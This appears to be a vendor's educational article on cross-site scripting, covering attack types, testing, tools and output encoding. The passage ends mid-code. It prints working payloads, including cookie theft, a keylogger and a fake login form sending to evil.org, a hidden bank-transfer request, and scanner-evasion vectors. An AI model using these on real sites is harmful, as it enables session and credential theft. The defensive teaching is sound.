What is a cross-site scripting (XSS) attack?

With the world switching to remote work on a scale never seen previously, cybercriminals have become more active than ever. Security at many organizations has suffered since workers have started working from insecure home networks and using their own (possibly infected) personal computers. As a result, the potential danger from the most frequent attack vectors can hardly be overestimated.

Our research shows that for years now, XSS vulnerabilities have consistently taken first place in terms of prevalence online. In this article, we discuss the potential dangers and prevention of XSS cyberattacks.

Definition

Cross-site scripting, often abbreviated as XSS, is a type of attack in which malicious scripts are injected into websites and web applications so that they run on the end user's device. The attack works because the application includes unsanitized or unvalidated input (user-entered data) in the output it sends to the browser.

Some XSS attacks do not have a specific target; the attacker simply exploits a vulnerability in the application or site and takes advantage of anyone unlucky enough to fall victim. In many cases, however, XSS is delivered more directly, for example through a link in an email message. Either way, an XSS attack turns a web application or website into a vector for delivering malicious scripts to the web browsers of unsuspecting victims.

XSS attacks can exploit vulnerabilities in a range of programming environments, including VBScript, Flash, ActiveX, and JavaScript. Most often, XSS targets JavaScript because of the language's tight integration with most browsers. This ability to exploit commonly used platforms makes XSS attacks both dangerous and common.

How cross-site scripting works

Armed with this idea of what a cross-site scripting attack is, let's see how it works.

Imagine a person sitting at a computer. The screen shows a file manager, text editor, spreadsheet, and music player icon in the lower-right corner. All is ordinary and familiar so far. But something is missing from this picture—an Internet browser with dozens of tabs open simultaneously.

These tabs are filled with interesting headlines, funny videos, ads for sporting goods, online stores, and a payment site with a just-paid receipt for a speeding ticket. All of these sites have one thing in common: they would hardly be possible without JavaScript.

Then a simple click on an advertising banner opens another page. The page contains a script that connects to an online banking site and quietly transfers money from the user's account to the attacker's card. Rather unpleasant, to put it mildly. Fortunately, browsers make this much harder thanks to the same-origin policy (SOP). Under this policy, a script running on a page can access only data that belongs to the same origin as that page (the same protocol, domain, and port). A script on the advertising page therefore cannot read the banking site's pages, cookies, or responses.
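To make the notion of "same origin" concrete, here is a minimal Java sketch that compares two URLs by protocol, host, and port. It is an illustration only, not how any browser implements the policy; the class name and the example hosts are hypothetical, and only the default ports of http and https are handled.

```java
import java.net.URI;
import java.util.Locale;

final class SameOrigin {
    // Falls back to the default port when the URL does not specify one
    // (assumes the scheme is http or https)
    static int effectivePort(URI uri) {
        if (uri.getPort() != -1) {
            return uri.getPort();
        }
        return "https".equalsIgnoreCase(uri.getScheme()) ? 443 : 80;
    }

    // Two URLs share an origin only if scheme, host, and port all match
    static boolean sameOrigin(String a, String b) {
        URI ua = URI.create(a);
        URI ub = URI.create(b);
        return ua.getScheme().equalsIgnoreCase(ub.getScheme())
                && ua.getHost().toLowerCase(Locale.ROOT)
                        .equals(ub.getHost().toLowerCase(Locale.ROOT))
                && effectivePort(ua) == effectivePort(ub);
    }
}
```

A page at https://bank.example/account and a request to https://bank.example:443/transfer share an origin; changing the protocol to http, the host to ads.example, or the port to 8443 breaks the match.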

Does this guarantee a happy ending?

If it did, this article wouldn't exist. Cybercriminals use various methods to bypass the SOP and exploit application vulnerabilities. When successful, they make the user's browser execute an arbitrary script on a given page.

Making an attack to infect a website

The same-origin policy only lets a script access data from the origin of the page it runs on. So to reach a user's data on a target site, the attacker's script has to run inside a page served by that site. In reality, attackers don't have direct access to the server responsible for that page. So how do attackers do it?

Application vulnerabilities can help attackers by enabling them to embed fragments and malicious code in page content.

For example, a typical search engine echoes the user's query when displaying search results. What if the user tries to find the string "<script>alert(1)</script>"? Will the contents of the search results page lead to this script being executed, and will a dialog box with the message "1" appear? This depends on how well the web application developers verify user input and transform it into a safe format.

The main difficulty is that users run a wide variety of browsers, from the latest pre-alpha builds to versions that are no longer supported, and every browser handles web pages in a slightly different way. A payload that one browser ignores may run in another, so an XSS attack can succeed whenever input filtering misses a case that some browser will execute. That is why the first step in an XSS attack is to determine how user data gets embedded in a web page.

Infected website attacks users

The second step is for the attacker to convince the user to visit a specific page. The attacker also needs to pass the attack vector to the page. Once again, there is nothing here that poses a serious obstacle. Websites often accept data as part of a URL. To implement the attack vector, attackers can use various social engineering or phishing methods.

The following example code displays just such a string (passed by the user in the HTTP request) in the server's response:

```java
protected void doGet(HttpServletRequest request, HttpServletResponse resp)
        throws IOException {
    // The parameter is taken from the request as-is
    String firstName = request.getParameter("firstName");
    resp.getWriter().append("<div>");
    // Vulnerable: user input is written into the HTML without escaping
    resp.getWriter().append("Search for " + firstName);
    resp.getWriter().append("</div>");
}
```

The code reads the value of the firstName URL parameter from the user's request and writes it to the resulting web page. The developer apparently expects firstName to contain only plain text without HTML tags. If the attacker sends the request "http://very.good.site/search?firstName=<script>alert(1)</script>", the final page will look as follows:

```html
<div>Search for <script>alert(1)</script></div>
```

You can easily check that when this HTML fragment is loaded in the user's browser, the script passed in the firstName URL parameter is executed. The malicious JavaScript runs in the user's browser in the context of the vulnerable site, so it can access that domain's cookie data, its API, and more. Of course, a real attacker would design the vector to conceal its presence on the page the user sees.
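The path from the attacker's link to the final page can be reproduced without the Servlet API. The following sketch is a simplified stand-in for the servlet above: the hypothetical firstName helper plays the role of request.getParameter, decoding the query string roughly as a servlet container would, and render concatenates the result into HTML the same way the vulnerable code does.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;

final class ReflectedSearch {
    // Simplified stand-in for request.getParameter("firstName"):
    // finds the parameter in a raw query string and URL-decodes it
    static String firstName(String query) {
        for (String pair : query.split("&")) {
            int eq = pair.indexOf('=');
            if (eq > 0 && pair.substring(0, eq).equals("firstName")) {
                return URLDecoder.decode(pair.substring(eq + 1), StandardCharsets.UTF_8);
            }
        }
        return "";
    }

    // Reproduces the servlet's output: the decoded value is inserted unchanged
    static String render(String query) {
        return "<div>" + "Search for " + firstName(query) + "</div>";
    }
}
```

The URL-encoded payload %3Cscript%3Ealert(1)%3C%2Fscript%3E comes out of render as a live <script> element, which is why the value has to be escaped before it is written to the page.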

Statistics and analytics

According to Positive Technologies analytics, XSS is among the three most common web application attacks. The relative percentage of XSS compared to other attack types has dipped in previous years. Still, there is no sign of XSS losing popularity.

Why is XSS still near the top of the list? Consider the number of vulnerable websites. As detailed in our 2019 report, more than two-thirds of tested websites had XSS vulnerabilities.

Sectors most commonly targeted by XSS are hospitality and entertainment (33%), finance (29%), education and science (29%), and transportation (26%). IT (16%) and government (16%) are also impacted, but not to the same extent.

Types of cross-site scripting attacks

Most XSS attacks can be divided into three categories:

  • Reflected (non-persistent). The carrier of the attack vector is the current client HTTP request. The server returns a response containing the attack vector. In essence, the server reflects the attack.
  • Stored (persistent). The attack vector is located on the server side. (We will talk about how exactly it gets there a bit later in this article.)
  • DOM-based XSS (Document Object Model). The attack vector is on the client side. Exploitation is possible primarily due to flaws in data processing inside JavaScript code.

A few other categories exist as well, although they are seen less frequently. They include:

  • Flash-based XSS. This vulnerability comes from insufficient processing of user input in Flash applications.
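  • XSSI (cross-site script inclusion). A page on another domain includes a script resource from the vulnerable application (for example, a JavaScript or JSONP response containing user data) and reads the data it exposes.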

Browser vulnerabilities can also contribute to XSS risks, for example:

  • uXSS (Universal XSS). This vulnerability allows bypassing the SOP to execute JavaScript from one site on another.
  • mXSS (Mutation XSS). Attackers bypass filtering with an HTML payload that looks safe but is changed into a dangerous form when the browser parses it and inserts it into the DOM, for example through element.innerHTML = value or document.write(value).

Reflected (non-persistent) XSS

In reflected XSS, the attack vector is inside the client's HTTP request processed by the server. This happens when the server builds its response from the request data: for example, the request could be a search query and the response might be the results page that repeats it.

Reflected XSS occurs if the server does a poor job of escaping HTML special characters in that data. The page returned to the browser then contains the JavaScript from the original attack vector, and the browser executes it in the context of the vulnerable site.

Example of reflected (non-persistent) XSS

Here is an example of code vulnerable to reflected XSS:

```java
protected void info(HttpServletResponse resp, String info) throws IOException {
    resp.getWriter().append("<h4>Info</h4>");
    // Vulnerable if info comes from the request: it is written without escaping
    resp.getWriter().append(info);
}
```

Stored (persistent) XSS

This type of application vulnerability occurs when an attack vector containing JavaScript doesn't arrive in a user request. Instead, the JavaScript code is loaded from server-side storage (such as the database or file system).

The application might allow you to save data from an untrusted source and, subsequently, use this data to generate a server response to a client's request. Paired with poor handling of HTML escape sequences, this presents an opportunity for a stored XSS attack.

Imagine an online forum where people communicate regularly. If the application is vulnerable, an attacker can post a message with embedded JavaScript. The message will be saved in the system database. After that, the script in question will be executed by all users who read the message posted by the attacker.

Example of stored (persistent) XSS

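An example of code vulnerable to stored XSS:

```java
protected void doGet(HttpServletRequest rq, HttpServletResponse resp)
        throws ServletException, IOException {
    String name = rq.getParameter("NAME");
    StringBuilder res = new StringBuilder();
    // Parameterized query: avoids the SQL injection that string concatenation would add.
    // DB is assumed to be a java.sql.Connection, as implied by the original snippet.
    String query = "SELECT fullname FROM emp WHERE name = ?";
    try (PreparedStatement ps = DB.prepareStatement(query)) {
        ps.setString(1, name);
        ResultSet rs = ps.executeQuery();
        res.append("<table class=\"table\"><tr><th>Employee</th></tr>");
        while (rs.next()) {
            res.append("<tr><td>");
            // Vulnerable: the stored value is written to the page without escaping
            res.append(rs.getString("fullname"));
            res.append("</td></tr>");
        }
        res.append("</table>");
    } catch (SQLException e) {
        throw new ServletException(e);
    }
    resp.getWriter().append(res.toString());
}
```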

Here, data is read from the database and the results are written to the page without any escaping. If the data stored in the database contains HTML markup, including JavaScript, it will be passed to the client and executed by the browser in the context of the web application.
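A minimal sketch of the fix, assuming the full names have already been read from the ResultSet into a list (the class and method names are hypothetical). Each stored value is treated as untrusted and HTML-escaped at the moment it is written into the table, regardless of how it got into the database.

```java
import java.util.List;

final class EmployeeTable {
    // Escape & first so that entities produced by later replacements are not double-escaped
    static String escapeHtml(String s) {
        return s.replace("&", "&amp;")
                .replace("<", "&lt;")
                .replace(">", "&gt;")
                .replace("\"", "&quot;")
                .replace("'", "&#x27;");
    }

    // Builds the same table as the servlet, but escapes each stored value on output
    static String render(List<String> fullNames) {
        StringBuilder res = new StringBuilder("<table class=\"table\"><tr><th>Employee</th></tr>");
        for (String fullName : fullNames) {
            res.append("<tr><td>").append(escapeHtml(fullName)).append("</td></tr>");
        }
        return res.append("</table>").toString();
    }
}
```

A name stored as <img src=x onerror=alert(1)> is rendered as harmless text instead of a tag.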

DOM-based attacks

The two types of XSS vulnerabilities described above have something in common: the web page with embedded JavaScript is formed on the server side. However, the client frameworks used in modern web applications allow changing a web page without accessing the server. The document object model can be modified directly on the client side.

The main premise behind this vulnerability remains the same: poorly implemented processing of HTML special characters lets attacker-controlled JavaScript appear in the text of a web page, where the browser executes it in the context of the vulnerable site.

Example of DOM-based attacks

Consider the following code, which is vulnerable to this type of attack:

```html
<div id="message-text">This is a warning alert</div>
```

The HTML code has an element with the "message-text" identifier, meaning that it is used to display the text of a message. The DOM tree is then modified by the following JavaScript function:

```javascript
function warning(message) {
    // Inserts message as HTML markup, not as plain text
    $("#message-text").html(message);
    $("#message").prop('style', 'display:inherit');
}
```

The script displays the message with jQuery's html() method, which inserts the string as HTML markup without escaping it. Therefore, such an implementation is vulnerable. For example, the following could be passed to this function:

```html
<script>alert("XSS")</script>
```

In this case, the script will be executed in the user's browser in the context of the vulnerable site.

Cross-site scripting (XSS) examples

Before we go into specific examples, we should also point out an important distinction. Some XSS attacks are aimed at acquiring information only once. In these cases, the victim computer executes a malicious script and sends stolen information to an attacker-controlled server.

Other attacks, however, focus on repeated exploits by:

  • Hijacking a user session and logging in to the account to collect information.
  • Phishing for the victim's username and password, then logging in to the account.
  • Changing the password of the victim. This is possible when the application allows changing or resetting passwords without having to enter the old password (or a one-time code).
  • Creating a new privileged user, when the victim has the rights to do so.
  • Implanting a JavaScript backdoor. For this, the victim needs to have rights to edit page content. This could also involve stored XSS on frequently visited pages, if the victim has the necessary rights.
  • Attacking the application itself with the victim's rights. Such attacks have targeted WordPress (remote code execution [RCE] through the template/plugin editor in the admin panel) and Joomla (RCE through upload of arbitrary files).

As we have seen, XSS allows executing JavaScript in the context of a vulnerable web application. But unlike SQLi, XXE, AFR, and other attacks aimed at the server, XSS executes its scripts in the end user's web browser. The primary goal of an XSS attack is to access the user's resources. Let's look at a few examples of such attacks.

1. Session hijacking

Imagine the following scenario. A user opens a browser and goes to an online banking page. The user is prompted to log in with their username and password. Obviously, the user's subsequent actions should then be regarded as legitimate. But how do you verify this legitimacy without asking the user to log in after every single click?

Fortunately for users, there is a way of doing that. After successful authentication, the server generates a string that uniquely identifies the current user session. This string is passed in a response header, in the form of cookie data. The following screenshot shows an example of a server response in which the session cookie is called JSESSIONID:

On subsequent visits to the server, the cookie data will be automatically included in the request. This data will be used by the server to determine whether the request comes from a legitimate user. Naturally, the security of session cookies then becomes critical. Any interception of this information would enable impersonating a legitimate user.
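For the session identifier to be safe, it has to be unguessable. Here is a minimal sketch of generating one in Java, assuming 32 bytes from SecureRandom encoded as URL-safe Base64; the length, encoding, and class name are illustrative choices, not what any particular server uses for JSESSIONID.

```java
import java.security.SecureRandom;
import java.util.Base64;

final class SessionIds {
    private static final SecureRandom RANDOM = new SecureRandom();

    // 32 random bytes (256 bits) encoded as URL-safe Base64 without padding: 43 characters
    static String newSessionId() {
        byte[] bytes = new byte[32];
        RANDOM.nextBytes(bytes);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(bytes);
    }
}
```

An unguessable value does not help, however, if an injected script can simply read it from the cookie, which is exactly what the attack described next does.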

One of the classic ways to transfer session cookie data to an attacker is to send an HTTP request from the user's web browser to an attacker-controlled server. In this case, the request is generated by JavaScript that is embedded on a vulnerable web page. The cookie data is then transmitted in the parameters of this request. One example of an attack vector could be the following:

```html
<script>new Image().src="http://evil.org/do?data="+document.cookie;</script>
```

In this example, the user's web browser creates an image object. Setting its src property makes the browser try to load the image from that address, which sends the cookie data to the attacker's site, where a corresponding HTTP request handler records it:

```java
@GetMapping(value = "/do", produces = MediaType.IMAGE_PNG_VALUE)
public @ResponseBody byte[] getImage(@RequestParam(name = "data") String data)
        throws IOException {
    // Record the cookie string received in the "data" parameter
    log.info("Document.cookie = {}", data);
    // Return a 1x1 PNG so the request looks like an ordinary image load
    try (InputStream in = getClass().getResourceAsStream("/images/1x1.png")) {
        return IOUtils.toByteArray(in);
    }
}
```

In this case, an attacker only needs to listen to incoming connections, or else configure event logs and obtain cookie data from the log files (this is described later in more detail).

Later on, an attacker can use session cookie data in their own requests to impersonate the user.

2. Impersonating the current user

JavaScript is a very capable programming language, and an attacker exploiting an XSS vulnerability can use all of its capabilities in the attack vector. So XSS is not just a way to obtain critical user data; it can also be a way to conduct an attack directly from the user's browser.

For example, XMLHttpRequest objects are used to send HTTP requests to web application resources. Such requests can submit form data via POST automatically and invisibly to the user, which can be used to send comments or to conduct financial transactions:

```html
<script>
    var req = new XMLHttpRequest();
    req.open('POST', 'http://bank.org/transfer', true);
    req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    req.send('from=A&to=B&amount=1000');
</script>
```

By exploiting an XSS vulnerability with this attack vector, malicious actors can transfer any specified amount of money to their accounts.

3. Phishing attacks

As noted already, XSS can be used to embed JavaScript scripts that modify the DOM model in a web page. This allows an attacker to change how the website appears to the user, such as by creating fake input forms. If a vulnerable web application permits modifications to the DOM model, an attacker could inject a fake authentication form into the web page by using the following attack vector:

```html
<h3>Please login to proceed</h3>
<form action="http://evil.org/login" method="post">
    Username:<br><input type="text" name="username"><br>
    Password:<br><input type="password" name="password"><br>
    <br><input type="submit" value="Logon">
</form>
```

The following form then appears on the web page:

Any credentials that a user enters in this form will be sent as a POST request to the evil.org attacker website:

4. Capture keystrokes

Opportunities for exploiting XSS vulnerabilities are not limited to scripts embedded directly in the page. If an attacker has an Internet server, malicious scripts can be loaded directly from it. An attacker could deploy the following script to capture keystrokes:

```javascript
var buffer = [];
var evilSite = 'http://evil.org/keys?data=';

// Record each key press together with its timestamp
document.onkeypress = function (e) {
    var timestamp = Date.now();
    var stroke = { k: e.key, t: timestamp };
    buffer.push(stroke);
};

// Every 600 ms, send any buffered keystrokes to the attacker's server
window.setInterval(function () {
    if (0 == buffer.length) return;
    var data = encodeURIComponent(JSON.stringify(buffer));
    new Image().src = evilSite + data;
    buffer = [];
}, 600);
```

The script here implements a keystroke interceptor that saves each character and its timestamp to an internal buffer. It also sends the buffered data to the evil.org attacker server every 600 milliseconds (a little less than twice per second).

In order to embed this keylogger script on a target web page, actors can use the following attack vector:

```html
<script src="http://evil.org/js?name=keystrokes"></script>
```

After the exploit is triggered, the user's keystrokes on the web page will be redirected to the attacker server:

The screenshot shows entries from the event log on the attacker server. In this example, the user has typed "James" on the keyboard. These records show keystrokes presented in JSON format: the field "k" contains a character and the field "t" contains the corresponding timestamp.

What are the consequences of XSS attacks?

From these examples and attack vectors, it is clear that a successful XSS attack on a vulnerable web application gives attackers a very powerful tool. With XSS, attackers have the capability to:

  • Read any data and perform arbitrary actions by impersonating the user. Such actions may include posting on social media or conducting banking transactions.
  • Intercept user input.
  • Deface web pages.
  • Inject malicious code into web pages. Such functionality may be reminiscent of Trojans, including fake forms for entering credentials or paying for online orders.

Cross-site scripting attacks can also be leveraged for financial benefit in more indirect ways. For example, severe XSS attacks can be used to embed advertising information or manipulate Internet ratings through DOM modification.

Risk levels of XSS vulnerabilities

Impact typically depends on the type of XSS vulnerability (for example, stored or reflected), difficulty of implementation, and whether it requires authentication (perhaps not everybody has access to the page in question).

Other factors include what additional actions, if any, are required from the user; whether the attack is triggered reliably; and what exactly a potential attacker could gain. If the site does not contain private information (because there is no authentication or distinction between users), then the impact is minimal.

The Positive Technologies Security Threatscape divides XSS into three categories:

  • Low. Vulnerabilities on routers or other local devices requiring authorization. XSS here requires privileged user rights, or, roughly speaking, self-XSS. Since the difficulty of an attack is relatively high, the resulting impact is small.
  • Medium. Here we refer to all reflected and stored XSS attacks that require visiting a certain page (social engineering). This is more critical and has a greater impact, since stored XSS is easier for attackers. But because the user must still log in first, the criticality is not so high.
  • High. In this case, the user independently visits a page that contains a malicious script. Some examples are XSS in a personal message, a blog comment, or an admin panel that appears immediately after login (in the user list via username or in logs via the User-Agent header).

A website might have stored XSS, resulting in High impact. However, if you need a certain level of access to visit that site, then the impact is reduced to Medium.

It's also important to mention that in any case, impact depends on the author's assessment of criticality—researchers have their own viewpoints. XSS vulnerabilities can be of high severity, but typically they receive scores below those given to other types of attacks.

Examples of vulnerabilities

The following examples come from Positive Research or automated detections by Positive Technologies security products such as MaxPatrol and PT Application Inspector. Severity levels are those valid as of the vulnerability publication date.

  • Advantech WebAccess: CVE-2015-3948
    Severity level: Low
    Advantech WebAccess versions prior to 8.1 allow remote authenticated users to inject arbitrary web scripts or HTML. As a result, attackers can obtain sensitive information.
    PT-2016-02: Cross-Site Scripting in Advantech WebAccess
  • SAP NetWeaver Development Infrastructure Cockpit: CVE: not assigned
    Severity level: Medium
    A vulnerability was detected in the nwdicockpit/srv/data/userprefs component of SAP NetWeaver Development Infrastructure Cockpit, by means of which malicious code could be injected into a victim's browser and executed.
    PT-2018-40: Stored XSS in SAP NetWeaver Development Infrastructure Cockpit
  • Wonderware Information Server: CVE-2013-0688
    Severity level: High
    A vulnerability in Wonderware Information Server allows attackers to inject arbitrary code into a web page viewed by other users or to bypass client-side security in web browsers. The attack can be initiated remotely and no authentication is required for successful exploitation.
    PT-2013-37: Multiple Cross-Site Scripting (XSS) in Wonderware Information Server

Detecting and testing for XSS

The best way to test your own application, or one for which you have source code, is by combining manual and automated techniques. Static code analysis should be able to detect a number of XSS vulnerabilities.

How well detection works depends heavily on the scanner. Different scanners use different vectors and techniques, so some will be more reliable than others, and none of them will be perfect. For example, a manual tester may find issues that a black-box scanner missed. If you want to increase automated test coverage, you could add a gray-box or white-box solution to complement the black-box approach.

Another hazard to bear in mind is the possibility of false positives. Combining techniques and tools will improve the outcome, but certain issues will still take manual work to identify.

Here is a video from our colleague with an example. This particular case involves vulnerabilities in the Acorn JavaScript parser. Many other parsers have this vulnerability as well.

Any XSS vulnerability analyzer has to parse the page's HTML and JavaScript. If the parser can't recognize the JavaScript code in some part of the page, that code is not passed to the analyzer correctly. This means that by tricking the parser, it is possible to make a successful XSS attack that bypasses the scanner entirely.

The specific code that is not recognized by the Acorn parser (as of the time of the video's release) is presented below.

Tag Attribute Injection <img>:

<img bar="entry"> where entry equals ><svg/onload='alert(1)'onLoad="alert(1);//

Function Injection:

<body onload="think.oob(entry)"> where entry equals )}.{0:promt(1

In both cases, the scanner did not find potential XSS vulnerabilities in the code. We can conclude that manual testing is likely the most effective method, as long as you know what you're doing.

Testing is not limited to just injecting "<script>alert('hi')</script>" into a text box. Trial and error is unavoidable. But if you inject code, check the resulting HTML page, and see what happens after you change the vector, you are likely to find weaknesses.

You can cover many potential attack vectors by following a similar pattern:

1. Start by looking for places with no special character filtering (> <"'). BurpSuite or Acunetix can automate this process. After automatic verification, make sure to manually check filtering on any form of text input.

2. The next step is analyzing the JavaScript code of the project. BlueClosure can automatically test the entire frontend. After eliminating vulnerabilities that can be found automatically, pay special attention to where the application displays user input and where that input is passed to the server (and subsequently saved to the database).

3. Then consider not only the JavaScript code, but all parts of the system as a whole. For example, some elements involve turning user input data into links or other hypertext elements. Embedding a link like "javascript:alert(1)" in a website field in a user profile is a very frequent vector in successful attacks. Any parser that converts text to HTML potentially opens the door to malicious code.

Pay special attention to the following elements:

  • Markdown editors that allow users to add custom HTML markup (including malicious JavaScript) to forum posts
  • Text-to-emoji converters that can be tricked into producing an infected element
  • URL and email converters that turn text into a link
  • Text-to-picture converters and the ability to set profile pictures hosted on third-party resources

Most common attack vectors

To get a better understanding of XSS vulnerabilities, let's analyze each of the major threat vectors.

<script> tag

This one is a relatively simple XSS script. It can be placed as an external script reference (external payload) or embedded within the script tag itself.

```html
<!-- External script -->
<script src=http://evil.com/xss.js></script>
<!-- Embedded script -->
<script> alert("XSS"); </script>
```

JavaScript events

Another commonly used vector is the onload/onerror event handler attributes, which can be used in many different tags.

```html
<!-- onload attribute in the <body> tag -->
<body onload=alert("XSS")>
```

<body> tag

An attack can be delivered within the <body> tag either through JavaScript events, as described earlier, or through tag attributes that can be similarly exploited.

```html
<!-- background attribute -->
<body background="javascript:alert('XSS')">
```

<img> tag

Browsers can also run JavaScript code associated with the <img> tag.

```html
<!-- <img> tag XSS -->
<img src="javascript:alert('XSS');">
<!-- <img> tag XSS using lesser-known attributes -->
<img dynsrc="javascript:alert('XSS')">
<img lowsrc="javascript:alert('XSS')">
```

<input> tag

The <input> tag can be manipulated if it has "image" in its type attribute.

```html
<!-- <input> tag XSS -->
<input type="image" src="javascript:alert('XSS');">
```

<div> tag

In older browsers, the style attribute of the <div> tag can carry embedded scripts, which attackers can exploit.

```html
<!-- <div> tag XSS -->
<div style="background-image: url(javascript:alert('XSS'))">
<!-- <div> tag XSS -->
<div style="width: expression(alert('XSS'));">
```

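This list is not comprehensive. Note also that many of these vectors, such as javascript: URLs in image attributes and CSS expression(), work only in legacy browsers such as old versions of Internet Explorer. For a full list, we recommend checking out the XSS Filter Evasion Cheat Sheet by OWASP.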

XSS testing tools

A rough classification of XSS testing solutions is as follows:

  • Multicomponent scanners covering multiple vulnerability types vs standalone XSS scanners
  • Free and open-source vs enterprise solutions

Standalone scanners are mostly self-written by pentesters, who adjust them as needed. Most XSS testing tools are a part of larger, more comprehensive vulnerability scanners.

Let's see how open-source and enterprise solutions stack up against each other.

Open-source tools

Advantages:
  • Free
  • Usually have a narrow focus, but do the job well
  • Wide variety to choose from: you can use many simultaneously

Disadvantages:
  • Low to medium quality in most cases
  • No centralized support
  • May integrate poorly (or not at all) with other security tools

Enterprise tools

Advantages:
  • Overall smooth process
  • Usually offered as an all-in-one software package
  • Easily integrated with other solutions from the same vendor
  • Vendor support and clear documentation
  • Regular updates

Disadvantages:
  • Price can be high
  • Large scanners may be cumbersome and have more false positives

Research shows that most vulnerabilities are caused by errors in source code. Therefore, it is important that your cybersecurity arsenal include a comprehensive source code analysis solution, such as PT Application Inspector. This is an enterprise solution that combines static, dynamic, and interactive approaches to make testing robust and thorough.

For a more detailed look at how PT AI performs in practice, we've prepared a quick rundown of its capabilities at the end of this article.

XSS attack prevention and mitigation

From a technical point of view, XSS is an injection-class vulnerability, in which the attacker manipulates the logic of the web application in a browser. So to prevent such vulnerabilities, one needs to thoroughly check any data that enters the application from the outside. To do so, the application must implement a number of approaches, which we describe here.

Force inputs to the same data type

User input initially arrives in string form. This data should be converted into objects of a specified type. This conversion is often implemented at the framework level, so that it is transparent to the developer. One such transparent process takes place in the following Java code:

```java
@GetMapping(value = "/result")
public void getJobResult(
        @RequestParam(name = "scan-id") Integer scanId,
        @RequestParam(name = "artifact") String artifact,
        HttpServletResponse response) throws ServiceUnavailableException {
    // Real controller code skipped
}
```

This example shows the declaration of an HTTP GET request handler. It's accessible at the relative path "/result" and takes two required parameters as input: integer scan-id and string artifact. During initial processing of the request, the framework performs the actions needed to determine the correctness of the inputs.

In the event of a type mismatch, the requesting party sees an error message even before control transfers to the application code. This would happen if, for instance, a scan-id parameter contains a non-numeric value.
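Outside a framework, the same idea amounts to parsing the raw string and refusing to continue when parsing fails. Here is a framework-independent sketch; the class and method names are hypothetical, and Spring's actual binding logic is more involved.

```java
import java.util.OptionalInt;

final class ScanIdParam {
    // Converts the raw string parameter to an int; anything that is not a number is rejected
    static OptionalInt parseScanId(String raw) {
        if (raw == null) {
            return OptionalInt.empty();
        }
        try {
            return OptionalInt.of(Integer.parseInt(raw));
        } catch (NumberFormatException e) {
            return OptionalInt.empty();
        }
    }
}
```

A value such as 42<script> never reaches the application code as text: it simply fails to parse, and the caller can answer with an error.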

Input validation

During validation, input data is checked against both grammatical and semantic criteria. The user's year of birth, say, can be checked for grammar with the regular expression "^[0-9]{4}$". This expression verifies that the string truly consists of four (and only four) digits. Once the string is converted to a number, we then need to check semantics: the year of birth should not be 1000 or 9876.
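The two checks for the year of birth can be sketched as follows. The lower bound of 1900 is an assumed cutoff chosen for illustration, and the current year is passed in as a parameter so that the check is easy to test.

```java
import java.time.Year;
import java.util.regex.Pattern;

final class BirthYear {
    // Grammar: exactly four ASCII digits
    private static final Pattern FOUR_DIGITS = Pattern.compile("^[0-9]{4}$");
    // Semantics: an assumed plausible range (the lower bound is illustrative)
    private static final int MIN_YEAR = 1900;

    static boolean isValid(String input, int currentYear) {
        if (input == null || !FOUR_DIGITS.matcher(input).matches()) {
            return false;
        }
        int year = Integer.parseInt(input);
        return year >= MIN_YEAR && year <= currentYear;
    }

    static boolean isValid(String input) {
        return isValid(input, Year.now().getValue());
    }
}
```

Both 1000 and 9876 pass the grammar check but fail the semantic one.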

It also makes sense to apply allowlist and blocklist validation. For a blocklist, you need to define certain patterns that shouldn't be found in the input data.

However, blocklists have serious disadvantages. The patterns tend to be complex and quickly become obsolete, and covering every possible permutation of malicious data is practically impossible, so developers inevitably end up struggling to catch up with attackers. This is why it is more reliable to apply an allowlist, which defines the rules that input data must comply with.
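The difference can be illustrated with a username field. This is a hypothetical sketch: the blocklist catches only the "<script" pattern, and the allowlist rule (3 to 20 Latin letters, digits, or underscores) is an example policy, not a recommendation for every application.

```java
import java.util.Locale;
import java.util.regex.Pattern;

// Contrasts a naive blocklist with an allowlist for a username field.
final class UsernameValidation {

    // Hypothetical allowlist rule: 3 to 20 Latin letters, digits, or underscores.
    private static final Pattern ALLOWED = Pattern.compile("[A-Za-z0-9_]{3,20}");

    private UsernameValidation() {}

    // Blocklist: rejects input only if it contains a known-bad pattern,
    // so any vector not on the list gets through.
    static boolean blocklistAccepts(String input) {
        return !input.toLowerCase(Locale.ROOT).contains("<script");
    }

    // Allowlist: accepts input only if it matches the permitted format.
    static boolean allowlistAccepts(String input) {
        return ALLOWED.matcher(input).matches();
    }
}
```

The blocklist rejects <ScRiPt>alert(1)</script> regardless of letter case, yet accepts <img src=x onerror=alert(1)>, which executes JavaScript without any script tag. The allowlist rejects both, because neither looks like a username.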

Output sanitization

Regardless of how well the previous two techniques are implemented, the key measure for preventing XSS is to check and encode output data. Untrusted data should not be inserted into an HTML document except in certain contexts, and even there it must follow rules that ensure the web browser treats it as data, not as code. These contexts include:

  • Content of an HTML element: <div>userData</div>
  • Value attribute of an HTML element: <input value="userData">
  • Value in JavaScript: var name="userData";
  • Value of a URL request parameter: http://site.org/?param=userData
  • Value in CSS: color:userData

Each of these contexts requires its own validation and encoding rules. For the content of an HTML element (such as inside <div>, <p>, <b>, <td>, and similar tags), XML and HTML special characters should be replaced with HTML entities: "&" with "&amp;", "<" with "&lt;", ">" with "&gt;", double quotes with "&quot;", and single quotes with "&#x27;".

The "/" character, which can close HTML tags, can additionally be replaced with "&#x2F;". On the server side, library functions can do this work. For example, user-entered data can be encoded with the StringEscapeUtils.escapeHtml4 method from the Apache Commons Text library:

import org.apache.commons.text.StringEscapeUtils;

String data = "<script>alert(1)</script>";
String safeData = StringEscapeUtils.escapeHtml4(data);

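The result of the conversion is the string "&lt;script&gt;alert(1)&lt;/script&gt;", which the browser displays as plain text instead of executing it as a script. Note that escapeHtml4 encodes "&", "<", ">", and double quotes but leaves single quotes and "/" unchanged: this is sufficient for element content, but not for single-quoted attribute values.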
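The replacements described above can also be written with the JDK alone. The following is a minimal sketch for the HTML element content context only; the class name HtmlEncoder is hypothetical. Unlike escapeHtml4, it also encodes single quotes and "/", so its output for the same input differs slightly.

```java
// Minimal encoder for untrusted data placed in HTML element content
// (for example, inside <div> or <td>). Not suitable for JavaScript,
// URL, or CSS contexts.
final class HtmlEncoder {

    private HtmlEncoder() {}

    static String encodeForHtml(String input) {
        StringBuilder out = new StringBuilder(input.length() + 16);
        for (int i = 0; i < input.length(); i++) {
            char c = input.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break; // starts an entity
                case '<':  out.append("&lt;");   break; // opens a tag
                case '>':  out.append("&gt;");   break; // closes a tag
                case '"':  out.append("&quot;"); break; // ends a double-quoted attribute
                case '\'': out.append("&#x27;"); break; // ends a single-quoted attribute
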